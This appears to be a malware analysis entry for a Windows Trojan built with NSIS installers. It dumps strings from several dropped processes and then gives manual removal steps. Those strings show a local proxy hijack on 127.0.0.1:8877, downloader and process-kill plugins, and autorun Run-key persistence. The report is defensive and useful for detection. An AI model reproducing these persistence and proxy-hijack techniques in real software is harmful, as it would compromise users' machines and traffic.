hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nse6.tmp\FindProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse6.tmp\FindProcDLL.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse6.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse6.tmp\FindProcDLL.dll
.reloc
Kernel32.DLL
PSAPI.DLL
FindProcDLL.dll
System.dll
callback%d
g.ZO||k[
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse6.tmp
nse6.tmp
C:\a\wincheckfe.exe
wincheckfe.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse5.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

EG9650tGGrxO3Eyr78zW.exe_1932:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc13.tmp\inetc.dll
cation Data\apEG9650tGGrxO3Eyr78zW.html
rome.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc13.tmp\inetc.dll
Override:<-loopback> || AutoConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc13.tmp
.reloc
SShL0
PeekNamedPipe
CreatePipe
nsExec.dll
99|9
: :0:5:>:
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
g.ZO||k[
%Documents and Settings%\%current user%\Local Settings\Application Data\apEG9650tGGrxO3Eyr78zW.html
A~loogg2.txt
rxO3Eyr78zW.html
PEG96~1.HTM
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc13.tmp\inetc.dll
ml/fide/lo2EG9650tGGrxO3Eyr78zW.txt
ConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc13.tmp
1464376
vchk.exe
r78zW.exe
1495040
C:\a\EG9650tGGrxO3Eyr78zW.exe
EG9650tGGrxO3Eyr78zW.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
http=127.0.0.1:8877;https=127.0.0.1:8877
C:\a\internetport3.exe
6.0.2900.5512
73581819.bat
.exe" -n vmusr
getcap.exe
winonit.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
ttps=127.0.0.1:8877
tport3.exe
9.bat
port3.exe
Tools\vmtoolsd.exe" -n vmusr

EG9650tGGrxO3Eyr78zW.exe_1932_rwx_10004000_00001000:

callback%d

wcheckf.exe_660:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
%Program Files%\Google\Chrome\Application\chrome.exe
e.exe
a\Google\Chrome\Application\chrome.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp8.tmp\FindProcDLL.dll
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp8.tmp
on\Internet Settings AutoConfigURL
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp8.tmp\FindProcDLL.dll
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
!%[ %S
g.ZO||k[
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp8.tmp
nsp8.tmp
ogram Files\Google\Chrome\Application\chrome.exe
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp8.tmp
C:\a\wcheckf.exe
wcheckf.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp7.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

wincheckfe.exe_1676_rwx_10004000_00001000:

callback%d

wcheckf.exe_660_rwx_10004000_00001000:

callback%d

winonit.exe_892:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvA.tmp\KillProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvA.tmp
.reloc
Kernel32.DLL
PSAPI.DLL
MSVCRT.dll
KillProcDLL.dll
u.Uj@
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
\.lR%
g.ZO||k[
C:\a\avv.txt
avv.txt
m\LOCALS~1\Temp\nsvA.tmp
ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvA.tmp
C:\a\winonit.exe
winonit.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv9.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

winonit.exe_892_rwx_10004000_00001000:

callback%d

getcap.exe_1236:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\a\7za.exe
S~1\Temp\nswE.tmp\System.dll
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswE.tmp\System.dll
C:\a\ukey.ini
7za.exe
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nswE.tmp\System.dll
GetCPInfo
MB, # %s =
RAM %s
Data Error in encrypted file. Wrong password?
CRC Failed in encrypted file. Wrong password?
Unsupported Method
Can not open encrypted archive. Wrong password?
Unsupported archive type
-p{Password}: set Password
is not supported archive
Enter password (will not be echoed):
Advapi32.dll
kernel32.dll
update operations are not supported for this archive
Mapi32.dll
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
OLEAUT32.dll
GetWindowsDirectoryW
E%SsK*X|
, .MN6b
1%uhx
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswE.tmp
ukey.ini
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswE.tmp
C:\a\getcap.exe
getcap.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswD.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
H7zCon.sfx
7-Zip cannot load Mapi32.dll
A* * .tar .tar
B* .tar

getcap.exe_1236_rwx_10004000_00001000:

callback%d

vchk.exe_232:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr10.tmp\nsExec.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr10.tmp\nsExec.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr10.tmp
.reloc
SShL0
PeekNamedPipe
CreatePipe
nsExec.dll
99|9
: :0:5:>:
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
g.ZO||k[
C:\a\avchk.txt
avchk.txt
\LOCALS~1\Temp\nsr10.tmp
hk.txt
96b4e010aa.exe
025.exe
"%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe"
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani
vchk.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsrF.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
5596b4e010aa.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

vchk.exe_232_rwx_10004000_00001000:

callback%d


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    WMIC.exe:3044
    vchk.exe:456
    taskkill.exe:2712
    taskkill.exe:3924
    taskkill.exe:3712
    taskkill.exe:1612
    taskkill.exe:760
    taskkill.exe:3288
    taskkill.exe:2968
    taskkill.exe:2524
    taskkill.exe:1948
    taskkill.exe:2520
    taskkill.exe:2324
    taskkill.exe:1940
    taskkill.exe:2328
    taskkill.exe:2248
    taskkill.exe:2400
    taskkill.exe:2292
    taskkill.exe:3996
    taskkill.exe:2844
    taskkill.exe:2408
    taskkill.exe:3760
    taskkill.exe:3488
    taskkill.exe:3836
    taskkill.exe:3764
    taskkill.exe:2708
    taskkill.exe:3832
    taskkill.exe:2852
    taskkill.exe:1152
    taskkill.exe:3400
    taskkill.exe:1496
    taskkill.exe:264
    taskkill.exe:3408
    taskkill.exe:3644
    taskkill.exe:2996
    taskkill.exe:3244
    taskkill.exe:4080
    taskkill.exe:2412
    taskkill.exe:3844
    taskkill.exe:412
    taskkill.exe:2792
    taskkill.exe:2148
    taskkill.exe:3948
    taskkill.exe:2476
    taskkill.exe:1324
    taskkill.exe:3820
    taskkill.exe:3276
    taskkill.exe:1924
    taskkill.exe:3308
    taskkill.exe:2600
    taskkill.exe:3208
    taskkill.exe:3676
    taskkill.exe:4044
    taskkill.exe:2308
    taskkill.exe:4040
    taskkill.exe:2780
    taskkill.exe:1852
    taskkill.exe:2304
    taskkill.exe:3388
    taskkill.exe:3008
    taskkill.exe:2380
    taskkill.exe:2664
    taskkill.exe:2660
    taskkill.exe:1652
    taskkill.exe:2260
    taskkill.exe:3744
    taskkill.exe:2200
    taskkill.exe:3584
    taskkill.exe:3556
    taskkill.exe:2280
    taskkill.exe:2448
    taskkill.exe:304
    taskkill.exe:3508
    taskkill.exe:4056
    taskkill.exe:2044
    taskkill.exe:2576
    taskkill.exe:3468
    taskkill.exe:2376
    taskkill.exe:432
    taskkill.exe:2484
    taskkill.exe:2616
    taskkill.exe:2596
    taskkill.exe:2920
    taskkill.exe:336
    taskkill.exe:1228
    taskkill.exe:2192
    taskkill.exe:3000
    taskkill.exe:3168
    taskkill.exe:172
    taskkill.exe:3452
    taskkill.exe:484
    taskkill.exe:2056
    taskkill.exe:2564
    taskkill.exe:3012
    taskkill.exe:2368
    taskkill.exe:3892
    taskkill.exe:2680
    taskkill.exe:3080
    taskkill.exe:2116
    taskkill.exe:3600
    taskkill.exe:2812
    taskkill.exe:3876
    taskkill.exe:3524
    taskkill.exe:3076
    taskkill.exe:2184
    taskkill.exe:220
    taskkill.exe:2216
    taskkill.exe:3200
    taskkill.exe:2896
    taskkill.exe:2892
    taskkill.exe:3500
    taskkill.exe:3964
    taskkill.exe:2108
    taskkill.exe:2692
    taskkill.exe:2104
    taskkill.exe:2860
    taskkill.exe:3868
    taskkill.exe:3900
    taskkill.exe:3636
    taskkill.exe:2636
    taskkill.exe:3632
    taskkill.exe:2436
    taskkill.exe:3060
    taskkill.exe:236
    taskkill.exe:4008
    taskkill.exe:2340
    taskkill.exe:1616
    taskkill.exe:3432
    taskkill.exe:4004
    taskkill.exe:3928
    taskkill.exe:2744
    taskkill.exe:1560
    taskkill.exe:2748
    taskkill.exe:2504
    taskkill.exe:1564
    taskkill.exe:3624
    taskkill.exe:2728
    taskkill.exe:3356
    taskkill.exe:3932
    taskkill.exe:3228
    taskkill.exe:2336
    taskkill.exe:3116
    taskkill.exe:3788
    taskkill.exe:3548
    taskkill.exe:2084
    taskkill.exe:2224
    taskkill.exe:1764
    %original file name%.exe:348

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\a\avv.txt (2432 bytes)
    C:\a\ahho.txt (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\hho[1].htm (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp\KillProcDLL.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\uur[1].htm (2 bytes)
    C:\a\auur.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\vv[1].htm (2432 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\localhost[1].htm (716 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\EG9650tGGrxO3Eyr78zW.html (716 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\inetc.dll (20 bytes)
    C:\a\1loogg2.txt (170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\apEG9650tGGrxO3Eyr78zW.html (324 bytes)
    C:\a\1logff.txt (718 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\ckkk[1].htm (303 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\ns29.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\ckkkp[1].htm (324 bytes)
    C:\a\vv11111.txt (26514 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\aEG9650tGGrxO3Eyr78zW.html (303 bytes)
    C:\a\7za.exe (15192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nswE.tmp\System.dll (11 bytes)
    %Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
    C:\a\ProcessList.txt (1888 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse6.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse6.tmp\FindProcDLL.dll (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp\FindProcDLL.dll (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\vchk[1].exe (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAC.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB3.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB6.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns74.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA8.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns95.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAA.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns40.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA2.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA5.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAF.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns34.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns21.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2C.tmp (6 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "interpee" = "C:\a\internetport3.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "dutoauto" = "C:\a\wincheckfe.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "cutoauto" = "C:\a\wincheckfe.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "interpee" = "C:\a\internetport3.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "autoauto" = "73581819.bat"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "rutoauto" = "73581819.bat"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
